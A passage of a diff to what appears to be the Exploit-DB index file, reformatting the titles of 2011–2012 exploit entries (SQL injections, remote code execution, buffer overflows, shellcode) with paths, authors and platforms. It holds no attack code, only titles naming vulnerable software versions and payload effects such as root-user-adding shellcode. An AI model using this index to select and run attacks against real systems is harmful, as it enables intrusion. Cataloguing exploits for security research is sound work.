Exploit",2011-10-23,EgiX,php,webapps,0 18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - CSRF (Add Admin User)",2011-10-23,"EjRaM HaCkEr",php,webapps,0 18023,platforms/php/dos/18023.java,"phpLDAPadmin 0.9.4b - DoS",2011-10-23,Alguien,php,dos,0 -18024,platforms/windows/dos/18024.txt,"Win32k Null Pointer De-reference PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0 +18024,platforms/windows/dos/18024.txt,"Win32k - Null Pointer De-reference PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0 18025,platforms/multiple/dos/18025.txt,"Google Chrome - Denial of Service (DoS)",2011-10-23,"Prashant Uniyal",multiple,dos,0 18042,platforms/php/webapps/18042.txt,"Techfolio 1.0 Joomla Component - SQL Injection",2011-10-28,"Chris Russell",php,webapps,0 18043,platforms/windows/dos/18043.py,"GFI Faxmaker Fax Viewer 10.0 (build 237) - DoS (PoC)",2011-10-28,loneferret,windows,dos,0 @@ -15670,7 +15667,7 @@ id,file,description,date,author,platform,type,port 18030,platforms/windows/dos/18030.pl,"BlueZone Desktop Multiple - Malformed files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,windows,dos,0 18031,platforms/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection",2011-10-25,Metasploit,php,webapps,0 18032,platforms/windows/webapps/18032.rb,"SAP Management Console OSExecute Payload Execution",2011-10-24,Metasploit,windows,webapps,0 -18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop XSS",2011-10-26,M.Jock3R,php,webapps,0 +18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop - XSS",2011-10-26,M.Jock3R,php,webapps,0 18036,platforms/php/webapps/18036.txt,"eFront 3.6.10 - (build 11944) Multiple Security Vulnerabilities",2011-10-27,EgiX,php,webapps,0 18037,platforms/php/webapps/18037.rb,"phpScheduleIt PHP - reserve.php start_date Parameter Arbitrary Code Injection",2011-10-26,Metasploit,php,webapps,0 18038,platforms/windows/local/18038.rb,"GTA SA-MP server.cfg - Buffer Overflow",2011-10-26,Metasploit,windows,local,0 @@ -15680,12 +15677,12 @@ id,file,description,date,author,platform,type,port 18048,platforms/php/webapps/18048.txt,"Vik Real Estate 1.0 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18049,platforms/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos,0 18050,platforms/php/webapps/18050.txt,"Joomla HM-Community - (com_hmcommunity) Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0 -18051,platforms/windows/remote/18051.txt,"BroadWin WebAccess SCADA/HMI Client Remote Code Execution",2011-10-31,Snake,windows,remote,0 +18051,platforms/windows/remote/18051.txt,"BroadWin WebAccess SCADA/HMI Client - Remote Code Execution",2011-10-31,Snake,windows,remote,0 18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers - HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC",2011-10-31,rgod,windows,dos,0 18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress 3.1.4 - Stored XSS",2011-10-31,"Paul Loftness",php,webapps,0 18055,platforms/php/webapps/18055.txt,"WordPress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0 18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0 -18057,platforms/windows/remote/18057.rb,"NJStar Communicator 3.00 MiniSMTP Server Remote Exploit (Metasploit)",2011-10-31,"Dillon Beresford",windows,remote,0 +18057,platforms/windows/remote/18057.rb,"NJStar Communicator 3.00 - MiniSMTP Server Remote Exploit (Metasploit)",2011-10-31,"Dillon Beresford",windows,remote,0 18058,platforms/php/webapps/18058.txt,"Joomla Component Alameda (com_alameda) 1.0 - SQL Injection",2011-10-31,kaMtiEz,php,webapps,0 18061,platforms/hardware/webapps/18061.txt,"ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities",2011-11-01,"mehdi boukazoula",hardware,webapps,0 18062,platforms/windows/remote/18062.txt,"Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution",2011-11-02,rgod,windows,remote,0 @@ -15725,11 +15722,11 @@ id,file,description,date,author,platform,type,port 18102,platforms/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 < 2.2.10 - Remote Buffer Overflow (LIST) (Metasploit)",2011-11-09,Node,windows,remote,0 18108,platforms/php/webapps/18108.rb,"Support Incident Tracker 3.65 - Remote Command Execution",2011-11-13,Metasploit,php,webapps,0 18105,platforms/linux/local/18105.sh,"glibc LD_AUDIT arbitrary DSO - Load Privilege Escalation",2011-11-10,zx2c4,linux,local,0 -18106,platforms/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 PDF/WWF File Handling DoS",2011-11-11,LiquidWorm,windows,dos,0 +18106,platforms/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 - .PDF/.WWF File Handling DoS",2011-11-11,LiquidWorm,windows,dos,0 18107,platforms/windows/dos/18107.py,"Kool Media Converter 2.6.0 - DoS",2011-11-11,swami,windows,dos,0 18109,platforms/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Stack Buffer Overflow",2011-11-13,Metasploit,windows,local,0 18110,platforms/php/webapps/18110.txt,"Mambo CMS 4.x - (Zorder) SQL Injection",2011-11-13,"KraL BeNiM",php,webapps,0 -18119,platforms/windows/dos/18119.rb,"Attachmate Reflection FTP Client Heap Overflow",2011-11-16,"Francis Provencher",windows,dos,0 +18119,platforms/windows/dos/18119.rb,"Attachmate Reflection FTP Client - Heap Overflow",2011-11-16,"Francis Provencher",windows,dos,0 18120,platforms/linux/dos/18120.py,"FleaHttpd - Remote Denial of Service",2011-11-16,condis,linux,dos,80 18111,platforms/php/webapps/18111.php,"WordPress Zingiri Plugin 2.2.3 - (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0 18132,platforms/php/webapps/18132.php,"Support Incident Tracker 3.65 - (translate.php) Remote Code Execution",2011-11-19,EgiX,php,webapps,0 @@ -15737,7 +15734,7 @@ id,file,description,date,author,platform,type,port 18113,platforms/windows/local/18113.rb,"Mini-Stream RM-MP3 Converter 3.1.2.1 - (.pls) Stack Buffer Overflow",2011-11-14,Metasploit,windows,local,0 18114,platforms/php/webapps/18114.txt,"WordPress AdRotate plugin 3.6.6 - SQL Injection",2011-11-14,"Miroslav Stampar",php,webapps,0 18115,platforms/php/webapps/18115.txt,"Pixie CMS 1.01 < 1.04 - Blind SQL Injections",2011-11-14,Piranha,php,webapps,0 -18116,platforms/multiple/dos/18116.html,"Firefox 8.0 Null Pointer Dereference PoC",2011-11-14,0in,multiple,dos,0 +18116,platforms/multiple/dos/18116.html,"Firefox 8.0 - Null Pointer Dereference PoC",2011-11-14,0in,multiple,dos,0 18117,platforms/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Time-based SQL Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps,0 18118,platforms/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq File Upload",2011-11-15,PCA,php,webapps,0 18121,platforms/php/webapps/18121.txt,"FreeWebshop 2.2.9 R2 - (ajax_save_name.php) Remote Code Execution",2011-11-16,EgiX,php,webapps,0 @@ -15765,7 +15762,7 @@ id,file,description,date,author,platform,type,port 18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH (sh4) - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0 18155,platforms/php/webapps/18155.txt,"Zabbix 1.8.4 - (popup.php) SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0 18156,platforms/php/webapps/18156.txt,"php video script - SQL Injection",2011-11-25,longrifle0x,php,webapps,0 -18159,platforms/linux/dos/18159.py,"XChat Heap Overflow DoS",2011-11-25,"Jane Doe",linux,dos,0 +18159,platforms/linux/dos/18159.py,"XChat - Heap Overflow DoS",2011-11-25,"Jane Doe",linux,dos,0 18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 19400,platforms/php/webapps/19400.txt,"WordPress Website FAQ Plugin 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0 @@ -15779,10 +15776,10 @@ id,file,description,date,author,platform,type,port 18176,platforms/windows/local/18176.py,"Microsoft Windows XP/2003 - afd.sys Local Privilege Escalation Exploit (MS11-080)",2011-11-30,ryujin,windows,local,0 18177,platforms/php/webapps/18177.txt,"WikkaWiki 1.3.2 - Multiple Security Vulnerabilities",2011-11-30,EgiX,php,webapps,0 18178,platforms/windows/local/18178.rb,"CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit (.m3u) (Metasploit)",2011-11-30,Rh0,windows,local,0 -18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0 +18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller - Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0 18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD - Remote Root Exploit",2011-12-01,kingcope,freebsd,remote,0 -18182,platforms/windows/remote/18182.txt,"Serv-U FTP Jail Break",2011-12-01,kingcope,windows,remote,0 -18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer Remote Stack BoF (Metasploit)",2011-12-01,"Nick Freeman",windows,remote,0 +18182,platforms/windows/remote/18182.txt,"Serv-U FTP - Jail Break",2011-12-01,kingcope,windows,remote,0 +18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer - Remote Stack BoF (Metasploit)",2011-12-01,"Nick Freeman",windows,remote,0 18184,platforms/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows (Metasploit)",2011-12-01,"Nick Freeman",windows,local,0 18185,platforms/php/webapps/18185.txt,"Muster Render Farm Management System - Arbitrary File Download",2011-12-01,"Nick Freeman",php,webapps,0 18186,platforms/windows/local/18186.rb,"StoryBoard Quick 6 - Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,local,0 @@ -15792,7 +15789,7 @@ id,file,description,date,author,platform,type,port 18190,platforms/windows/remote/18190.rb,"Serv-U FTP Server < 4.2 - Buffer Overflow",2011-12-02,Metasploit,windows,remote,0 18192,platforms/php/webapps/18192.txt,"Joomla Jobprofile Component (com_jobprofile) - SQL Injection",2011-12-02,kaMtiEz,php,webapps,0 18193,platforms/php/webapps/18193.txt,"WSN Classifieds 6.2.12 / 6.2.18 - Multiple Vulnerabilities",2011-12-02,d3v1l,php,webapps,0 -18200,platforms/windows/dos/18200.txt,"SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC",2011-12-05,LiquidWorm,windows,dos,0 +18200,platforms/windows/dos/18200.txt,"SopCast 3.4.7 - sop:// URI Handling Remote Stack Buffer Overflow PoC",2011-12-05,LiquidWorm,windows,dos,0 18195,platforms/windows/local/18195.rb,"CCMPlayer 1.5 - Stack based Buffer Overflow (.m3u)",2011-12-03,Metasploit,windows,local,0 18196,platforms/windows/dos/18196.py,"NJStar Communicator MiniSmtp - Buffer Overflow [ASLR Bypass]",2011-12-03,Zune,windows,dos,0 18197,platforms/lin_x86-64/shellcode/18197.c,"Linux/x86-64 - execve(/bin/sh) shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode,0 @@ -15806,15 +15803,15 @@ id,file,description,date,author,platform,type,port 18217,platforms/php/webapps/18217.txt,"SantriaCMS - SQL Injection",2011-12-08,Troy,php,webapps,0 18218,platforms/php/webapps/18218.txt,"QContacts 1.0.6 - (Joomla component) SQL injection",2011-12-08,Don,php,webapps,0 18210,platforms/php/webapps/18210.txt,"Php City Portal Script Software - SQL Injection",2011-12-07,Don,php,webapps,0 -18212,platforms/php/webapps/18212.txt,"phpBB MyPage Plugin SQL Injection",2011-12-07,CrazyMouse,php,webapps,0 +18212,platforms/php/webapps/18212.txt,"phpBB MyPage Plugin - SQL Injection",2011-12-07,CrazyMouse,php,webapps,0 18213,platforms/php/webapps/18213.php,"Traq 2.3 - Authentication Bypass / Remote Code Execution Exploit",2011-12-07,EgiX,php,webapps,0 18214,platforms/php/webapps/18214.py,"SMF 2.0.1 - SQL Injection / Privilege Escalation",2011-12-07,The:Paradox,php,webapps,0 18220,platforms/windows/dos/18220.py,"CyberLink Multiple Products - File Project Handling Stack Buffer Overflow PoC",2011-12-09,modpr0be,windows,dos,0 18221,platforms/linux/dos/18221.c,"Apache HTTP Server - Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos,0 18222,platforms/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection",2011-12-09,Don,php,webapps,0 -18223,platforms/windows/dos/18223.pl,"Free Opener Local Denial of Service",2011-12-09,"Iolo Morganwg",windows,dos,0 +18223,platforms/windows/dos/18223.pl,"Free Opener - Local Denial of Service",2011-12-09,"Iolo Morganwg",windows,dos,0 18224,platforms/php/webapps/18224.php,"Docebo Lms 4.0.4 - (messages) Remote Code Execution",2011-12-09,mr_me,php,webapps,0 -18225,platforms/linux/dos/18225.c,"CSF Firewall Buffer Overflow",2011-12-09,"FoX HaCkEr",linux,dos,0 +18225,platforms/linux/dos/18225.c,"CSF Firewall - Buffer Overflow",2011-12-09,"FoX HaCkEr",linux,dos,0 18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - connect back shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 18228,platforms/linux/local/18228.sh,"Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Privilege Boundary Crossing Local Root Exploit",2011-12-10,otr,linux,local,0 @@ -15827,21 +15824,21 @@ id,file,description,date,author,platform,type,port 18239,platforms/php/webapps/18239.rb,"Traq 2.3 - Authentication Bypass / Remote Code Execution Exploit (Metasploit)",2011-12-13,Metasploit,php,webapps,0 18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - Webserver Stack Buffer Overflow",2011-12-13,Metasploit,windows,remote,0 18243,platforms/php/webapps/18243.rb,"PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection Exploit (2)",2011-12-14,Metasploit,php,webapps,0 -18246,platforms/php/webapps/18246.txt,"Seotoaster SQL Injection Admin Login Bypass",2011-12-16,"Stefan Schurtz",php,webapps,0 +18246,platforms/php/webapps/18246.txt,"Seotoaster - SQL Injection Admin Login Bypass",2011-12-16,"Stefan Schurtz",php,webapps,0 18247,platforms/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",multiple,webapps,0 18248,platforms/php/webapps/18248.pl,"mPDF 5.3 - File Disclosure",2011-12-16,ZadYree,php,webapps,0 18249,platforms/php/webapps/18249.txt,"appRain CMF 0.1.5 - Multiple Web Vulnerabilities",2011-12-19,Vulnerability-Lab,php,webapps,0 18250,platforms/php/webapps/18250.txt,"DotA OpenStats 1.3.9 - SQL Injection",2011-12-19,HvM17,php,webapps,0 18251,platforms/php/webapps/18251.txt,"Joomla Component (com_dshop) - SQL Injection",2011-12-19,CoBRa_21,php,webapps,0 -18257,platforms/windows/dos/18257.txt,"IrfanView TIFF Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0 +18257,platforms/windows/dos/18257.txt,"IrfanView - .TIFF Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0 18254,platforms/windows/dos/18254.pl,"Free Mp3 Player 1.0 - Local Denial of Service",2011-12-19,JaMbA,windows,dos,0 -18256,platforms/windows/dos/18256.txt,"IrfanView FlashPix PlugIn Double-Free",2011-12-20,"Francis Provencher",windows,dos,0 +18256,platforms/windows/dos/18256.txt,"IrfanView FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",windows,dos,0 18258,platforms/windows/local/18258.c,"TORCS 1.3.1 acc Buffer Overflow",2011-12-20,"Andrés Gómez",windows,local,0 18259,platforms/php/webapps/18259.txt,"Infoproject Business Hero - Multiple Vulnerabilities",2011-12-21,LiquidWorm,php,webapps,0 18260,platforms/jsp/webapps/18260.txt,"Barracuda Control Center 620 - Multiple Web Vulnerabilities",2011-12-21,Vulnerability-Lab,jsp,webapps,0 18261,platforms/php/webapps/18261.txt,"SpamTitan 5.08 - Multiple Vulnerabilities",2011-12-21,Vulnerability-Lab,php,webapps,0 -18262,platforms/multiple/webapps/18262.txt,"Plone and Zope Remote Command Execution PoC",2011-12-21,"Nick Miles",multiple,webapps,0 -18268,platforms/windows/dos/18268.txt,"FreeSSHd Crash PoC",2011-12-24,Level,windows,dos,0 +18262,platforms/multiple/webapps/18262.txt,"Plone and Zope - Remote Command Execution PoC",2011-12-21,"Nick Miles",multiple,webapps,0 +18268,platforms/windows/dos/18268.txt,"FreeSSHd - Crash PoC",2011-12-24,Level,windows,dos,0 18265,platforms/php/webapps/18265.txt,"Tiki Wiki CMS Groupware 8.2 - (snarf_ajax.php) Remote PHP Code Injection",2011-12-22,EgiX,php,webapps,0 18266,platforms/php/webapps/18266.py,"Open Conference/Journal/Harvester Systems 2.3.x - Multiple RCE Vulnerabilities",2011-12-23,mr_me,php,webapps,0 18269,platforms/windows/dos/18269.py,"MySQL 5.5.8 - Remote Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 @@ -15852,7 +15849,7 @@ id,file,description,date,author,platform,type,port 18275,platforms/win_x86-64/dos/18275.txt,"GdiDrawStream BSoD using Safari",2011-12-18,webDEViL,win_x86-64,dos,0 18276,platforms/php/webapps/18276.txt,"WordPress Mailing List Plugin - Arbitrary File Download",2011-12-26,6Scan,php,webapps,0 18277,platforms/php/webapps/18277.txt,"Free Image Hosting Script - Arbitrary File Upload",2011-12-26,ySecurity,php,webapps,0 -18278,platforms/linux/dos/18278.txt,"Nagios Plugin check_ups Local Buffer Overflow PoC",2011-12-26,"Stefan Schurtz",linux,dos,0 +18278,platforms/linux/dos/18278.txt,"Nagios Plugin check_ups - Local Buffer Overflow PoC",2011-12-26,"Stefan Schurtz",linux,dos,0 18280,platforms/linux/remote/18280.c,"Telnetd encrypt_keyid - Remote Root Function Pointer Overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0 18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 - Universal Exploit (Metasploit)",2011-12-27,"Fady Mohammed Osman",windows,remote,0 18412,platforms/php/webapps/18412.php,"WordPress Kish Guest Posting Plugin 1.0 - Arbitrary File Upload",2012-01-23,EgiX,php,webapps,0 @@ -15864,8 +15861,8 @@ id,file,description,date,author,platform,type,port 18292,platforms/php/webapps/18292.txt,"Dede CMS - SQL Injection",2011-12-30,"CWH and Nafsh",php,webapps,0 18293,platforms/php/webapps/18293.txt,"Akiva WebBoard 8.x - SQL Injection",2011-12-30,"Alexander Fuchs",php,webapps,0 18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 - Polymorphic Shellcode setuid(0) + setgid(0) + add user _iph_ without password to /etc/passwd",2011-12-31,pentesters.ir,lin_x86,shellcode,0 -18295,platforms/linux/dos/18295.txt,"lighttpd Denial of Service PoC",2011-12-31,pi3,linux,dos,0 -18296,platforms/php/dos/18296.txt,"PHP Hashtables Denial of Service",2012-01-01,infodox,php,dos,0 +18295,platforms/linux/dos/18295.txt,"lighttpd - Denial of Service PoC",2011-12-31,pi3,linux,dos,0 +18296,platforms/php/dos/18296.txt,"PHP - Hashtables Denial of Service",2012-01-01,infodox,php,dos,0 18297,platforms/php/webapps/18297.txt,"WSN Links Script 2.3.4 - SQL Injection",2012-01-02,"H4ckCity Security Team",php,webapps,0 18298,platforms/php/webapps/18298.txt,"Php-X-Links Script - SQL Injection",2012-01-02,"H4ckCity Security Team",php,webapps,0 18300,platforms/php/webapps/18300.txt,"MyPHPDating 1.0 - SQL Injection",2012-01-02,ITTIHACK,php,webapps,0 @@ -15881,13 +15878,13 @@ id,file,description,date,author,platform,type,port 18977,platforms/php/dos/18977.php,"PHP 5.3.10 - spl_autoload_register() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 18978,platforms/php/dos/18978.php,"PHP 5.3.10 - spl_autoload_call() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 18979,platforms/php/webapps/18979.txt,"vanilla forums poll plugin 0.9 - Stored XSS",2012-06-03,"Henry Hoggard",php,webapps,0 -18980,platforms/php/webapps/18980.txt,"Vanilla Forums 2.0.18.4 Tagging Stored XSS",2012-06-03,"Henry Hoggard",php,webapps,0 +18980,platforms/php/webapps/18980.txt,"Vanilla Forums 2.0.18.4 - Tagging Stored XSS",2012-06-03,"Henry Hoggard",php,webapps,0 18320,platforms/php/webapps/18320.txt,"Posse Softball Director CMS - (team.php) Blind SQL Injection",2012-01-04,"Easy Laster",php,webapps,0 19381,platforms/php/webapps/19381.php,"SugarCRM CE 6.3.1 - 'unserialize()' PHP Code Execution",2012-06-23,EgiX,php,webapps,0 18322,platforms/php/webapps/18322.txt,"TinyWebGallery 1.8.3 - Remote Command Execution",2012-01-06,Expl0!Ts,php,webapps,0 18985,platforms/php/webapps/18985.txt,"pyrocms 2.1.1 - Multiple Vulnerabilities",2012-06-05,LiquidWorm,php,webapps,0 -18327,platforms/netware/dos/18327.txt,"Novell Netware XNFS.NLM NFS Rename Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 -18328,platforms/netware/dos/18328.txt,"Novell Netware XNFS.NLM STAT Notify Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 +18327,platforms/netware/dos/18327.txt,"Novell Netware - XNFS.NLM NFS Rename Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 +18328,platforms/netware/dos/18328.txt,"Novell Netware - XNFS.NLM STAT Notify Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 18329,platforms/multiple/webapps/18329.txt,"Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0 18330,platforms/php/webapps/18330.txt,"WordPress Plugin pay with tweet 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0 18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution (0Day)",2012-01-08,"b33f & g11tch",windows,local,0 @@ -15904,7 +15901,7 @@ id,file,description,date,author,platform,type,port 18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 - ST (RRQ) Buffer Overflow Exploit",2012-01-10,b33f,windows,remote,0 18347,platforms/php/webapps/18347.txt,"Pragyan CMS 3.0 - Remote File Disclosure",2012-01-10,Or4nG.M4N,php,webapps,0 18348,platforms/php/webapps/18348.txt,"w-cms 2.01 - Multiple Vulnerabilities",2012-01-10,th3.g4m3_0v3r,php,webapps,0 -18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0 +18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 - Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0 18350,platforms/php/webapps/18350.txt,"WordPress Age Verification Plugin 0.4 - Open Redirect",2012-01-10,"Gianluca Brindisi",php,webapps,0 18351,platforms/netware/dos/18351.txt,"Novell Netware - XNFS caller_name xdrDecodeString Remote Code Execution",2012-01-10,"Francis Provencher",netware,dos,0 18352,platforms/php/webapps/18352.txt,"YABSoft Advanced Image Hosting Script - SQL Injection",2012-01-12,"Robert Cooper",php,webapps,0 @@ -15924,7 +15921,7 @@ id,file,description,date,author,platform,type,port 18366,platforms/windows/local/18366.rb,"Adobe Reader - U3D Memory Corruption",2012-01-14,Metasploit,windows,local,0 18367,platforms/windows/remote/18367.rb,"XAMPP - WebDAV PHP Upload",2012-01-14,Metasploit,windows,remote,0 18368,platforms/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,Metasploit,linux,remote,0 -18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,Metasploit,bsd,remote,0 +18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service - Encryption Key ID Buffer Overflow",2012-01-14,Metasploit,bsd,remote,0 18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 - mChannel use after free (2)",2012-01-17,Metasploit,osx,remote,0 18378,platforms/linux/dos/18378.c,"Linux IGMP - Remote Denial of Service (Introduced in linux-2.6.36)",2012-01-17,kingcope,linux,dos,0 18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For php/html Writable Files and Add Your Code shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0 @@ -15943,7 +15940,7 @@ id,file,description,date,author,platform,type,port 18700,platforms/php/webapps/18700.txt,"e-ticketing - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 18392,platforms/php/webapps/18392.php,"appRain CMF 0.1.5 - (uploadify.php) Unrestricted File Upload Exploit",2012-01-19,EgiX,php,webapps,0 18393,platforms/linux/remote/18393.rb,"Gitorious - Arbitrary Command Execution",2012-01-20,Metasploit,linux,remote,0 -18394,platforms/asp/webapps/18394.txt,"ICTimeAttendance Authentication Bypass",2012-01-20,v3n0m,asp,webapps,0 +18394,platforms/asp/webapps/18394.txt,"ICTimeAttendance - Authentication Bypass",2012-01-20,v3n0m,asp,webapps,0 18395,platforms/asp/webapps/18395.txt,"EasyPage - SQL Injection",2012-01-20,"Red Security TEAM",asp,webapps,0 18396,platforms/php/webapps/18396.sh,"WhatsApp Status Changer 0.2 - Exploit",2012-01-20,emgent,php,webapps,0 18397,platforms/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter 3.8.2 - Remote Pre-Auth Command Execution",2012-01-20,Abysssec,windows,remote,0 @@ -15974,8 +15971,8 @@ id,file,description,date,author,platform,type,port 18429,platforms/php/webapps/18429.pl,"4Images 1.7.6-9 - CSRF Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0 18430,platforms/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQLi",2012-01-30,"Craig Freyman",multiple,webapps,0 18431,platforms/multiple/webapps/18431.txt,"Ajax Upload - Arbitrary File Upload",2012-01-30,"Daniel Godoy",multiple,webapps,0 -18432,platforms/php/webapps/18432.txt,"phux Download Manager Blind SQL Injection",2012-01-30,"Red Security TEAM",php,webapps,0 -18435,platforms/php/webapps/18435.txt,"phpShowtime Directory Traversal",2012-01-31,"Red Security TEAM",php,webapps,0 +18432,platforms/php/webapps/18432.txt,"phux Download Manager - Blind SQL Injection",2012-01-30,"Red Security TEAM",php,webapps,0 +18435,platforms/php/webapps/18435.txt,"phpShowtime - Directory Traversal",2012-01-31,"Red Security TEAM",php,webapps,0 18436,platforms/linux/dos/18436.txt,"sudo 1.8.0 - 1.8.3p1 Format String",2012-01-31,joernchen,linux,dos,0 18434,platforms/php/webapps/18434.txt,"Snort Report 1.3.2 - SQL Injection",2012-01-31,"a.kadir altan",php,webapps,0 18437,platforms/windows/remote/18437.txt,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Remote Code Execution Exploit",2012-01-31,Abysssec,windows,remote,0 @@ -15996,7 +15993,7 @@ id,file,description,date,author,platform,type,port 18454,platforms/windows/dos/18454.txt,"NetSarang Xlpd Printer Daemon 4 - Denial of Service",2012-02-02,"SecPod Research",windows,dos,0 18455,platforms/php/webapps/18455.txt,"OSCommerce 3.0.2 - Persistent Cross-Site",2012-02-02,Vulnerability-Lab,php,webapps,0 18456,platforms/php/webapps/18456.txt,"Achievo 1.4.3 - Multiple Web Vulnerabilities",2012-02-02,Vulnerability-Lab,php,webapps,0 -18457,platforms/linux/dos/18457.py,"torrent-stats httpd.c Denial of Service",2012-02-03,otr,linux,dos,0 +18457,platforms/linux/dos/18457.py,"torrent-stats - httpd.c Denial of Service",2012-02-03,otr,linux,dos,0 18458,platforms/php/dos/18458.txt,"PHP 5.4SVN-2012-02-03 - htmlspecialchars/entities Buffer Overflow",2012-02-03,cataphract,php,dos,0 18460,platforms/php/dos/18460.php,"PHP 5.4.0RC6 (64-bit) - Denial of Service",2012-02-04,"Stefan Esser",php,dos,0 18461,platforms/windows/dos/18461.html,"Edraw Diagram Component 5 - ActiveX Buffer Overflow DoS",2012-02-04,"Senator of Pirates",windows,dos,0 @@ -16008,9 +16005,9 @@ id,file,description,date,author,platform,type,port 18468,platforms/php/webapps/18468.html,"Flyspray 0.9.9.6 - CSRF",2012-02-07,"Vaibhav Gupta",php,webapps,0 18469,platforms/windows/dos/18469.pl,"Typsoft FTP Server 1.10 - Multiple Commands DoS",2012-02-07,"Balazs Makany",windows,dos,0 18470,platforms/php/webapps/18470.txt,"Ananta Gazelle CMS - Update Statement SQL Injection",2012-02-08,hackme,php,webapps,0 -18471,platforms/windows/local/18471.c,"TORCS 1.3.2 xml Buffer Overflow /SAFESEH evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0 +18471,platforms/windows/local/18471.c,"TORCS 1.3.2 - xml Buffer Overflow /SAFESEH evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0 